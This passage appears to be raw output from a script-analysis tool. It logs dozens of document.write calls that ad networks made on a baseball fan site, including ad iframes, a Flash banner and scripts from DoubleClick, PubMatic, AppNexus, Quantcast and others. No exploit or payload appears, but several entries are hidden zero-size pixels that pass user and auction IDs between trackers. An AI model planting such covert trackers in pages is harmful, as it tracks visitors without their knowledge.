<iframe width="300" scrolling="no" height="250" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4377&creative_id=371685&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&exch_id=7&line_item_id=1850887&b=rh250.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=F47478FD-881F-434F-8330-33022F73830C&us_id=5543&invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&pub_line_item_id=87821&mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&inv_size_id=146842&campaign_id=252144&p_us_id=28812"></iframe>

#54 JavaScript::Write (size: 269, repeated: 1)

<img alt="" src="http://network.realmedia.com/5/track_targeting/276422772/x95/USNetwork/track_targeting/reporting/77352b4d335643707375634141746d30?XE&MAX-Site=bloguin&MAX-Campaign=USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign&XE" style="display:none;" />

#55 JavaScript::Write (size: 281, repeated: 1)

<img name='pimg0' width='0' height='0' style='position: absolute; top: -15000px;' marginwidth='0' marginheight='0' vspace='0' hspace='0' allowtransparency='true' scrolling='no' src=' http://loadm.exelator.com/load/?p=204&g=071&j=0&buid=CC78ACA8-9353-43AF-B346-6DE47ACCFD06 '></img>

#56 JavaScript::Write (size: 139, repeated: 1)

<img src="http://ad.yieldmanager.com/cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1" width="1" height="1"/>

#57 JavaScript::Write (size: 141, repeated: 1)

<img src="http://cm.g.doubleclick.net/pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D" width="1" height="1"/>

#58 JavaScript::Write (size: 107, repeated: 1)

<img src="https://www.facebook.com/fr/u.php?p=391363987594223&m=5858721859426781856" width="1" height="1"/>

#59 JavaScript::Write (size: 132, repeated: 1)

<img src='http://b.scorecardresearch.com/b?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=&cj=1' width='0' height='0' style='display: none;' />

#60 JavaScript::Write (size: 137, repeated: 1)

<img src='http://pixel.quantserve.com/pixel/p-a3g2Mplggde4A.gif' style='display: none;' border='0' height='1' width='1' alt='Quantcast'/>

#61 JavaScript::Write (size: 105, repeated: 1)

<img src='http://pt200191.unica.com/ntpagetag.gif?js=0&site=9859_fenway_west&account=yardbarkernetwork'/>

#62 JavaScript::Write (size: 121, repeated: 1)

<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-32633"/>

#63 JavaScript::Write (size: 10, repeated: 4)

<noscript>

#64 JavaScript::Write (size: 1882, repeated: 1)

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="base" width="728" height="90"><param name="movie" value="http://s0.2mdn.net/1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d32/7/90/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1709586981709445095%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a9b2e2-9d68-d676-6901-3c5fafca2592%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26" /><param name="wmode" value="opaque" /><param name="bgcolor" value="#FFFFFF" /><param name="Autostart" value="true" /><param name="Quality" value="high" /><param name="allowScriptAccess" value="always" /><embed wmode="opaque" src="http://s0.2mdn.net/1585961/NO_b2c_A_728x90_nl_banner_131112_2012111308375744.swf?targetTag=_blank&clickTag=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3d32/7/90/%252a/f%253B265055670%253B0-0%253B0%253B90677919%253B3454-728/90%253B51411577/51378850/1%253B%253B%257Esscs%253D%253fhttp%3A//pixel.mathtag.com/click/img%3Fmt_aid%3D1709586981709445095%26mt_id%3D239527%26mt_adid%3D100412%26mt_uuid%3D50a9b2e2-9d68-d676-6901-3c5fafca2592%26redirect%3Dhttp%3A//www.klm.com/travel/no_no/plan_and_book/special_offers/flight_offers/index.htm%3FWT.mc_id%3D1585961%7C7153410%7C90677919%7C265055670%7C1349429%7C51411577%26WT.tsrc%3Ddisplay%26" swLiveConnect="TRUE" width="728" height="90" type="application/x-shockwave-flash" pluginspage="undefined//www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" bgcolor="#FFFFFF" quality="high" allowScriptAccess="always"></embed></object>

#65 JavaScript::Write (size: 92, repeated: 1)

<script id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js?r756"></script>

#66 JavaScript::Write (size: 1454, repeated: 1)

<script language='JavaScript' src='http://bidder.mathtag.com/notify/js?exch=ctw&id=5aW95q2jLzEvTlhWNmFtWnBiVXRoTUhwS1FXRlhNazVFWjNWeVp3L05UQmhPV0l5WlRJdE9XUTJPQzFrTmpjMkxUWTVNREV0TTJNMVptRm1ZMkV5TlRreS8xNzA5NTg2OTgxNzA5NDQ1MDk1LzIzOTUyNy8xNjM0ODEvMTEvY1pPVUl2YUJmVUZqS3JnVnVBUzFvQXNoellKUTdsTVZ5aXpQMFlGcTFhUS8/yAkpis7FiubNE_63G83hm7pGm4o&sid=163481&cid=239527&price=UKmy5wADtTi2PVP-Z1JpJcLB2RHx8xtZnCLQjA'></script><div style="display:none;width:0;height:0"><script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "2102", c3: "0", c4: "800419", c5: "610742", c15: "", c16: "" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script><noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=800419&c5=610742&c6=&c15=&c16=&cv=2.0&cj=1" /></noscript></div><div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN.610742.800419,,ADSIZE.728X90" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME></div><div style="display:none"><iframe src="http://bh.contextweb.com/bh/visitormatch?tag=66900&pid=520266"></iframe></div>

#67 JavaScript::Write (size: 268, repeated: 1)

<script src="http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/BQDGKMYTZBBJNGPJAOOVU7?no-cookies=1&pv=4115850208.214622&width=160&height=600&x=0&y=0&site_url=http://fenwaywest.com&cpm=UKmy4QAETE4KOo1iZQBgEB04waUCfEeJNuCoQw&adroll_network=g"></script>

#68 JavaScript::Write (size: 227, repeated: 1)

<script src="http://tags.bluekai.com/site/2748?rg=production_bua&redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID%3D84%26partnerUID%3D%24_BK_UUID%26sscs_active%3D1" type="text/javascript"></script>

#69 JavaScript::Write (size: 102, repeated: 1)

<script src='http://b.scorecardresearch.com/beacon.js?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=' ></script>

#70 JavaScript::Write (size: 84, repeated: 3)

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#71 JavaScript::Write (size: 106, repeated: 1)

<script type="text/javascript" id="pmPostLoad_top_0_0" >PubMatic.pmAdInfo.jsAdLoaded( "top_0_0");</script>

#72 JavaScript::Write (size: 106, repeated: 1)

<script type="text/javascript" id="pmPostLoad_top_0_1" >PubMatic.pmAdInfo.jsAdLoaded( "top_0_1");</script>

#73 JavaScript::Write (size: 167, repeated: 1)

<script type="text/javascript" src="http://ad.doubleclick.net/adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=2;sz=160x600;ord=5887935212?"></script>

#74 JavaScript::Write (size: 167, repeated: 1)

<script type="text/javascript" src="http://ad.doubleclick.net/adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=;yb=ad;s1=;s2=;tile=3;sz=300x250;ord=5887935212?"></script>

#75 JavaScript::Write (size: 169, repeated: 1)

<script type="text/javascript" src="http://ad.doubleclick.net/adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=ist;yb=ad;s1=;s2=;tile=1;sz=728x90;ord=5887935212?"></script>

#76 JavaScript::Write (size: 389, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/imp?anmember=514&anprice=100&Z=300x250&s=653070&r=0&_salt=115542970&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html"></script>

#77 JavaScript::Write (size: 394, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/imp?anmember=514&anprice=40&Z=160x600&s=653070&r=0&_salt=1488817&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html"></script>

#78 JavaScript::Write (size: 231, repeated: 1)

<script type="text/javascript" src="http://ad.yieldmanager.com/imp?anmember=514&anprice=80&Z=300x250&s=1651067&r=0&_salt=698192661&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php"></script>

#79 JavaScript::Write (size: 446, repeated: 1)

<script type="text/javascript" src="http://ads.revsci.net/adserver/ako?rsi_random=406595164&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=300&rsi_height=250&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1"></script>

#80 JavaScript::Write (size: 551, repeated: 1)

<script type="text/javascript" src="http://ads.revsci.net/adserver/ako?rsi_random=442148774&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=8EAA6BB1DC11BF97CF079B3861A1A66E&rsi_width=300&rsi_height=250&rsi_secure=0&rsi_url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_referrer=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&rsi_title=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&rsi_inf=1"></script>

#81 JavaScript::Write (size: 450, repeated: 1)

<script type="text/javascript" src="http://ads.revsci.net/adserver/ako?rsi_random=733770519&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=160&rsi_height=600&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1"></script>

#82 JavaScript::Write (size: 166, repeated: 1)

<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=160;ad_h=600;ecaid=BQDGKMYTZBBJNGPJAOOVU7_XERC7SMQKFB2FO6VTX75I5_g;coid=412;nid=890;"></script>

#83 JavaScript::Write (size: 689, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=160x600&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D653070%26r%3D0%26_salt%3D1488817%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html"></script>

#84 JavaScript::Write (size: 679, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D653070%26r%3D0%26_salt%3D115542970%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html"></script>

#85 JavaScript::Write (size: 434, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&inv_code=1651067&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1651067%26r%3D0%26_salt%3D698192661%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26u%3Dhttp%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php"></script>

#86 JavaScript::Write (size: 1054, repeated: 1)

<script type="text/javascript" src="http://ib.adnxs.com/ttj?id=919932&size=300x250&referrer=http%3A//ad.yieldmanager.com/iframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnl-sqZpfyDOwpO0Qmtn.Ij9GlQg6LUP-tDMVRAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D698192661%2526anmember%253D514%2526anprice%253D80%2526r%253D0%2526s%253D1651067%2C10146920-3200-11e2-9fc0-1cc1def0ff7e%2C1353298662569&pt1=http://network.realmedia.com/3/bloguin/Passback/276422772@x15?RM_Exclude=USNetworkMAX_COMPCATEGORY&ext_inv_code=bloguin&cb=276422772&reserve=0.25&pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/276422772/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d335643707375634141746d30?"></script>

#87 JavaScript::Write (size: 360, repeated: 1)

<script type="text/javascript" src="http://tag.contextweb.com/TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66900&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=728X90&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=79046235&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US"></script>

#88 JavaScript::Write (size: 361, repeated: 1)

<script type="text/javascript" src="http://tag.contextweb.com/TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66901&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=32092403&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US"></script>

#89 JavaScript::Write (size: 361, repeated: 1)

<script type="text/javascript" src="http://tag.contextweb.com/TagPublish/GetAd.aspx?tagver=1&cp=520266&ct=66902&cn=1&crtg=&cwod=&epid=&esid=&ifurl=&tppg=&cf=160X600&rq=1&dw=300&cwu=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&cwr=&mrnd=87072411&if=1&tl=-1&pxy=&cxy=&dxy=&tz=-60&ln=en-US"></script>

#90 JavaScript::Write (size: 884, repeated: 1)

<script type="text/javascript" src=http://uat-net.technoratimedia.com/00/72/26/adserv_2672.js?ad_size=160x600&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html%2CB%253D1%2526Z%253D160x600%2526_salt%253D1488817%2526anmember%253D514%2526anprice%253D40%2526r%253D0%2526s%253D653070%2C0fabe2ec-3200-11e2-9d8b-3c4a92f73a52%2C1353298661884&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.4042896818223016></script>

#91 JavaScript::Write (size: 879, repeated: 1)

<script type="text/javascript" src=http://uat-net.technoratimedia.com/00/72/26/adserv_2672.js?ad_size=300x250,300x600&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQAQ7oEAAAAAAPL-IAAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAAmGQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0nl0zZ5fyDJK-L4dTr-5Wz7Lp7cDnX.5.rk.vAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18elijit_box..html%2CZ%253D300x250%2526_salt%253D115542970%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D653070%2C106c775a-3200-11e2-909d-b32498808ef9%2C1353298663146&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.9199917099665583></script>

#92 JavaScript::Write (size: 2054, repeated: 1)

<script type="text/javascript">
lwp_parent_ad_id=1549;
if(typeof ljt_beacon_vals==="undefined"){ljt_beacon_vals=[];}
ljt_beacon_vals[95029]="bannerid=1549&amp;campaignid=232&amp;cids=232&amp;bids=1549";
if((typeof(LJT_bCInfo)!=="undefined")&&(typeof(LJT_bCInfo[95029])!=="undefined")){ljt_beacon_vals[95029]+=LJT_bCInfo[95029];}  
</script><!-- 300x250 | ROS - Run-of-site -->
<script type="text/javascript">
  rsi_pub = '5EDFA30EEE61C6AE22A15EFEDE1C37E5';
  rsi_site = 'A7798C53EBE3A118D71E950376C2B010';
  rsi_width = '300';
  rsi_height = '250';
</script>
<script type="text/javascript" src="http://ads.revsci.net/adserver/rsiads.js"></script>
<!-- 300x250 | ROS - Run-of-site --><script type="text/javascript">LJT_Ads.servingPassback();</script><script type="text/javascript">var ljt_beacon = "<div id='beacon_1549' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap3iad3.lijit.com/www/delivery/lg.php?LJT_REQUEST_INFO&amp;zoneid=95029&amp;tid=95029_1353298662292da37f36c0459&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=198e1eed62' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"; ljt_beacon = ljt_beacon.replace("LJT_REQUEST_INFO", ljt_beacon_vals[95029]); document.write(ljt_beacon);</script><script language="JavaScript">function showPremiumAds95029(){var e = document.getElementById("lwp_ad_item_premium_95029"); if (e) { e.style.display="block"; return; }  var i = 0; var w = parent; while (i < 10 && w != null) { var e = w.document.getElementById("lwp_ad_item_premium_95029"); if (e != null ) { e.style.display="block"; i = 10; } ; if (w == self) { i = 10; } else { w = w.parent }; i++; }} showPremiumAds95029(); var lijit_ad_id = "lijit_text_ad_link_txt"; var lijit_text_ad_link = document.getElementById(lijit_ad_id); if (lijit_text_ad_link != null) { lijit_text_ad_link.target = "_blank";} var lijit_text_ad_container = document.getElementById("lijit_text_ad_container"); </script>

#93 JavaScript::Write (size: 2054, repeated: 1)

<script type="text/javascript">
lwp_parent_ad_id=1550;
if(typeof ljt_beacon_vals==="undefined"){ljt_beacon_vals=[];}
ljt_beacon_vals[95032]="bannerid=1550&amp;campaignid=232&amp;cids=232&amp;bids=1550";
if((typeof(LJT_bCInfo)!=="undefined")&&(typeof(LJT_bCInfo[95032])!=="undefined")){ljt_beacon_vals[95032]+=LJT_bCInfo[95032];}  
</script><!-- 160x600 | ROS - Run-of-site -->
<script type="text/javascript">
  rsi_pub = '5EDFA30EEE61C6AE22A15EFEDE1C37E5';
  rsi_site = 'A7798C53EBE3A118D71E950376C2B010';
  rsi_width = '160';
  rsi_height = '600';
</script>
<script type="text/javascript" src="http://ads.revsci.net/adserver/rsiads.js"></script>
<!-- 160x600 | ROS - Run-of-site --><script type="text/javascript">LJT_Ads.servingPassback();</script><script type="text/javascript">var ljt_beacon = "<div id='beacon_1550' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap3iad3.lijit.com/www/delivery/lg.php?LJT_REQUEST_INFO&amp;zoneid=95032&amp;tid=95032_1353298658273e3751f284eda&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=d93a230863' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"; ljt_beacon = ljt_beacon.replace("LJT_REQUEST_INFO", ljt_beacon_vals[95032]); document.write(ljt_beacon);</script><script language="JavaScript">function showPremiumAds95032(){var e = document.getElementById("lwp_ad_item_premium_95032"); if (e) { e.style.display="block"; return; }  var i = 0; var w = parent; while (i < 10 && w != null) { var e = w.document.getElementById("lwp_ad_item_premium_95032"); if (e != null ) { e.style.display="block"; i = 10; } ; if (w == self) { i = 10; } else { w = w.parent }; i++; }} showPremiumAds95032(); var lijit_ad_id = "lijit_text_ad_link_txt"; var lijit_text_ad_link = document.getElementById(lijit_ad_id); if (lijit_text_ad_link != null) { lijit_text_ad_link.target = "_blank";} var lijit_text_ad_container = document.getElementById("lijit_text_ad_container"); </script>

#94 JavaScript::Write (size: 1423, repeated: 1)

<script type="text/javascript"> document.writeln('<iframe width="300" scrolling="no" height="250" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://eeu.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=tG8AALVvAAArXwAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAACwBAAD6AAAACQAAAAAAAAACAAAAQ0M3OEFDQTgtOTM1My00M0FGLUIzNDYtNkRFNDdBQ0NGRDA2AAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_url=&cost=0.4377&creative_id=371685&zip_code=unknown&referrer_url=http%253A%252F%252Fwww.88websitedesign.com%252Findex.php&exch_id=7&line_item_id=1850887&b=rh250.ovq.wiz.cebq2&source_url=http%3A%2F%2Fwww.yardbarker.com&auction_id=F47478FD-881F-434F-8330-33022F73830C&us_id=5543&invite_uid=db273952-68a4-4097-8df2-7d98b16e5711&pub_line_item_id=87821&mapped_uid=7-CC78ACA8-9353-43AF-B346-6DE47ACCFD06&inv_size_id=146842&campaign_id=252144&p_us_id=28812"></iframe>');</script>

#95 JavaScript::Write (size: 124, repeated: 3)

<script type='text/javascript' src='http://ads.pubmatic.com/AdServer/js/cutildee6d705a5077f097c8c64e02d002b24.js' ></script>

#96 JavaScript::Write (size: 82, repeated: 1)

<script type='text/javascript' src='http://edge.quantserve.com/quant.js'></script>

#97 JavaScript::Write (size: 91, repeated: 1)

<script type='text/javascript' src='http://www.yardbarker.com/unica/ntpagetag.js'></script>

#98 JavaScript::Write (size: 42, repeated: 1)

<script type='text/javascript'>_qoptions={

#99 JavaScript::Write (size: 29, repeated: 2)

<script type=text/javascript>

#100 JavaScript::Write (size: 343, repeated: 1)

<script>(function(){if(d.getElementById('ba.js'))return;d.write('<sc'+'ript id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js?r756"></scr'+'ipt>');})();</script><script>d.write('<sc'+'ript>try{BAP.start(_bao);}catch(e){var _bab = _bab||[];var ob={}; for (var p in _bao) {ob[p]=_bao[p]}_bab.push(ob);}</sc'+'ript>');</script>

#101 JavaScript::Write (size: 128, repeated: 1)

<script>try{BAP.start(_bao);}catch(e){var _bab = _bab||[];var ob={}; for (var p in _bao) {ob[p]=_bao[p]}_bab.push(ob);}</script>

#102 JavaScript::Write (size: 22, repeated: 2)

<span class="PubAdAI">

#103 JavaScript::Write (size: 38, repeated: 1)

<span id="pubTestSpan_top_0_0"></span>

#104 JavaScript::Write (size: 38, repeated: 1)

<span id="pubTestSpan_top_0_1"></span>

#105 JavaScript::Write (size: 62, repeated: 1)

<style type="text/css">
#mygallery{overflow: hidden;}
</style>

#106 JavaScript::Write (size: 924, repeated: 1)

